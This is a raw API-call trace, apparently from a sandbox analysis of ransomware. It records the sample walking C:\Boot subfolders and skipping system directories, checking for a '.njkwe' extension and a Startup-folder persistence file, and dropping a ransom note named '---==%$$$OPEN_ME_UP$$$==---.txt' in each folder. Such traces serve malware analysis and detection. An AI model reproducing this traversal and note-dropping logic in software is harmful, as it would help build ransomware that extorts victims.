0xc27a58 [0065.075] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\*") returned 19 [0065.075] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-CA\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0065.076] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.076] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.076] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.076] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.076] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.076] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\.") returned 19 [0065.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.076] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.076] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.076] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.076] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.076] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.077] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.077] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\..") returned 20 [0065.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.077] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.077] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.077] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.077] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.077] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.077] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.077] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.077] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 33 [0065.077] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.077] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.077] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.077] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.077] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.077] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.077] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0065.077] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.077] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fr-ca\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.078] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.079] CloseHandle (hObject=0x428) returned 1 [0065.079] GetProcessHeap () returned 0xbe0000 [0065.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.079] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0065.079] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0065.079] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0065.079] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0065.079] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files") returned -1 [0065.079] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files (x86)") returned -1 [0065.079] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0065.079] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0065.079] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0065.079] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.079] GetProcessHeap () returned 0xbe0000 [0065.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.079] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0065.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0065.079] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.079] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.079] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.079] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.080] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.080] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0065.080] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.080] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.080] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.080] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.080] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.080] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.080] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.080] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0065.080] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.080] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.080] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.080] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.080] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.080] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.080] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.080] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.080] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0065.080] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.080] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.080] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.080] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.080] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.080] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.080] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.080] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.080] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.080] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.080] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.080] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui") returned 33 [0065.081] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.081] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.081] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.081] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.081] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.081] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.081] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0065.081] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.081] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fr-fr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.083] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.084] CloseHandle (hObject=0x428) returned 1 [0065.084] GetProcessHeap () returned 0xbe0000 [0065.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.084] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0065.084] lstrcmpiW (lpString1="hr-HR", lpString2="Windows") returned -1 [0065.084] lstrcmpiW (lpString1="hr-HR", lpString2="$Recycle.bin") returned 1 [0065.084] lstrcmpiW (lpString1="hr-HR", lpString2="System Volume Information") returned -1 [0065.084] lstrcmpiW (lpString1="hr-HR", lpString2="Program Files") returned -1 [0065.084] lstrcmpiW (lpString1="hr-HR", lpString2="Program Files (x86)") returned -1 [0065.084] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR") returned 17 [0065.084] lstrcmpW (lpString1="hr-HR", lpString2=".") returned 1 [0065.084] lstrcmpW (lpString1="hr-HR", lpString2="..") returned 1 [0065.084] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hr-HR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.084] GetProcessHeap () returned 0xbe0000 [0065.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.084] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\*") returned 19 [0065.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hr-HR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2e0 [0065.084] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.084] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.084] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.084] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.084] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.084] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\.") returned 19 [0065.084] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.084] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.085] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.085] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.085] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.085] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\..") returned 20 [0065.085] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.085] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.085] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.085] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.085] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.085] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.085] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.085] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.085] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 33 [0065.085] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.085] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.085] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.085] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.085] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.085] FindNextFileW (in: hFindFile=0xc1a2e0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.085] FindClose (in: hFindFile=0xc1a2e0 | out: hFindFile=0xc1a2e0) returned 1 [0065.085] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.085] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\hr-hr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.086] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.086] CloseHandle (hObject=0x428) returned 1 [0065.087] GetProcessHeap () returned 0xbe0000 [0065.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.087] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0065.087] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0065.087] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0065.087] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0065.087] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files") returned -1 [0065.087] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files (x86)") returned -1 [0065.087] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0065.087] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0065.087] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0065.087] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.087] GetProcessHeap () returned 0xbe0000 [0065.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.087] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0065.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0065.087] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.087] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.087] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.087] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.087] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.087] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\.") returned 19 [0065.087] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.087] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, 